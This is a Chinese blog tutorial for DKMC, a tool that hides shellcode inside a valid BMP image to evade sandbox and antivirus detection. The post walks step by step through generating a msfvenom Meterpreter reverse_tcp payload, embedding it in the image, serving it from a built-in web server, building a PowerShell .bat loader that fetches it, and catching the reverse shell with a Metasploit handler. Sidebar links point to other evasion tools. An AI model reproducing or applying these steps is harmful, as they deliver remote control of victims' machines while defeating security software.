DKMC ---- 恶意payload规避工具

最新推荐文章于 2024-02-03 12:06:26 发布
最新推荐文章于 2024-02-03 12:06:26 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: 安全工具 文章标签: powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cloudatlasm/article/details/79039391
版权

DKMC是一个生成混杂的shellcode存储在polyglot图像的工具。该图像是100%有效的,也是100%有效的shellcode。这个做法是避免沙箱分析,因为它是一个简单的“合法”的形象。目前该工具依PowerShell执行最终的shellcode有效载荷

1.下载

git clone https://github.com/Mr-Un1k0d3r/DKMC.git

2.运行
cd /path/ && python dkmc.py

这里写图片描述

3.使用方法

[*] (gen) Generate a malicious BMP image //创建一张恶意BMP格式的图片
[*] (web) Start a web server and deliver malicious image //启动web服务(内置)并传送恶意图片
[*] (ps) Generate Powershell payload //创建Powershell 有效载荷
[*] (sc) Generate shellcode from raw file //从原始文件生成shellcode
[*] (exit) Quit the application //退出

4.用msfvenom 生成一个payload

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.103 LPORT=4321 -f raw  > shellcode

5.生成shellcode
在DKMC中输入sc选项,set source 刚才生成的payload路径,设置完成后run 执行命令,会生成一大段shellcode ,复制这段代码贴到记事本中过会会用到
这里写图片描述
这里写图片描述

6.创建一张恶意BMP格式的图片
输入gen 来创建恶意BMP,需要设置三个选项 图片,shellcode 和输出文件
这里写图片描述
这里写图片描述

7.生成PowerShell执行脚本
输入ps 进入,复制生成的powershell 脚本,保存为.bat 文件

set url http://ip:8080/图片名

这里写图片描述

8.启动web服务(内置)并传送恶意图片
输入web 并设置端口为8080,
这里写图片描述

9.启动metasploit

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.103
set PORT 4321
exploit

10.等待.bat 文件执行,执行时web server 会有回显(200 表示成功,出现404请检查步骤7中的url设置)
这里写图片描述

11.成功
这里写图片描述
这里写图片描述

YnKhmIOU
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
think-payload:解析ThinkJS 3.0的主体数据
05-17
思维负荷 Thinkjs 3.0的有效负载 安装 $ npm install think-payload --save 用法 配置文件src/config/middleware.js const payload = require ( 'think-payload' ) ; module . exports = [ { handle : payload , options : { } } ] 控制器中的数据 this . ctx . body = this . ctx . request . body this.ctx.request.body post:已解析的正文将存储在post ,如果未进行任何解析,则body将为空对象{} 文件:解析的文件将存储在file [键名] 大小:文件大小 路径:文件路径 名称:文件名 类型:文件类型 mtime:文件上传时间 选项
Python-Atlas一个开源工具可以建议SQLMap篡改绕WAFIDSIPS
08-10
Atlas - 一个开源工具,可以建议SQLMap篡改绕WAF/IDS/IPS,该工具基于返回的状态代码。
白加黑免杀-利用微信&QQ上线CS,轻松过某绒、某卫士、Defender
qq_62169455的博客
02-03 1361
通常在运行一个EXE文件的时候,会先加载支持该EXE文件运行的DLL(动态链接库)文件,那如果把其中一个DLL文件替换成恶意DLL,DLL里面注入一个后门文件, 当被攻击者双击执行程序时,就会加载恶意DLL,进而触发后门文件,最终达到控制对方主机的目的。替换DLL操作,也就是我们所说的“DLL劫持”,而“白+黑”里面的“白”则指的是EXE文件(带有数字签名),“黑”则指替换的恶意DLL。
payload-dumper-go.exe
10-30
payload.bin文件分解比市面上那些PY分解速度快一倍,执行命令在CMD执行payload-dumper-go payload.bin,输出目录和单独提取某个IMG都可以设置,输出目录-o,单独输出某个IMG是-P就能得到分解.小米11分解payload.bin用时大概1分钟左右,看各位电脑处理速度
Powershell脚本加密以及持久化运行 + BMP隐藏Shellcode
weixin_30556959的博客
02-15 931
工欲善其事必先利其器本文所需工具DKMC,PWSH,Invoke-Obfuscation,empire1.DKMC(生成图片木马后门)下载地址:https://github.com/Mr-Un1k0d3r/DKMC参考链接:https://blog.csdn.net/cloudatlasm/article/details/79039391 http://www.secist.com/archi...
2022 年红队工具和模拟工具
m0_60571990的博客
11-30 1634
2022 年红队工具和模拟工具
远控免杀专题(15)-DKMC免杀
qq_41683305的博客
03-27 830
0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(202...
免杀Payload生成工具Veil的下载与使用
Goodric的博客
03-28 3524
免杀Payload生成工具Veil的下载与使用 Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件 ———— ———— 下载Veil kali 中输入指令 apt-get install veil 下载 veil(需要挺久) 下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。 我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
远控免杀专题(15)-DKMC免杀(VT免杀率8/55)
Ms08067安全实验室
04-13 574
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、远控免杀专题(1)-基础篇:https:...
将 Shellcode 藏在图片中
12-07
最近某安全会议上的某个的PPT,是英文的,内容如题所示是关于shellcode隐藏技术的。
payload-dumper-解包
03-22
解包payload.bin文件,获取系统的相关.img文件。亲测有效。
Phantom-Evasion:Python防病毒规避工具
05-25
幻影逃生3.0 Phantom-Evasion是一款使用python编写的防病毒逃避工具(均与python和python3兼容),即使使用最常见的x86 msfvenom有效负载,它也能够生成(几乎)完全无法检测到的可执行文件。 以下操作系统正式支持...
payload-dumper-win64
11-13
payload-dumper-win64
Python-XssforkXSS探测工具
08-10
xssfork作为sicklescan的一个功能模块,其开发... 传统的xss探测工具,一般都是采用 payload in response的方式,即在发送一次带有payload的http请求后,通过检测响应包中payload的完整性来判断,这种方式缺陷,很多。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character)...
Convert Payload-crx插件
03-10
Convert Payloader,将POST网络请求(例如,从Google收集)转换为可读格式。 将POST网络请求(例如,从Google收集)转换为可读格式。 无需大量工作即可轻松分析发帖请求。 转换器将请求拆分(使用'&'分隔符)以便于...
AT-MAC Adaptive MAC-frame payload tuning for reliable communication
12-21
In this paper, we propose an adaptive MAC-frame payload tuning mechanism for wireless body area networks (WBANs) to maximize the probability of successful packet delivery or reliability.
vgs-satellite:VGS离线整合
04-29
- HTTP request/response payload transformer - Route configuration generator according to specific request - Route configuration editor - Logging - Man-in-the-middle proxy functionality (request ...
--payload-delimiter
最新发布
03-28
payload-delimiter是一种用于分隔数据包中不同部分的特殊字符或字符串。它在通信协议或数据格式中起到标记不同数据段的作用,以便接收方可以正确解析和处理数据。 在网络通信中,payload-delimiter可以用于分隔不同的消息或数据块。它可以是一个特定的字符,比如换行符、制表符或者其他不常见的字符,也可以是一个固定长度的字符串。 payload-delimiter的使用可以帮助接收方准确地切分和解析数据,确保数据的完整性和正确性。它在很多通信协议和数据格式中都有应用,比如HTTP协议中的头部和正文之间的空行,以及CSV文件中不同字段之间的逗号等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值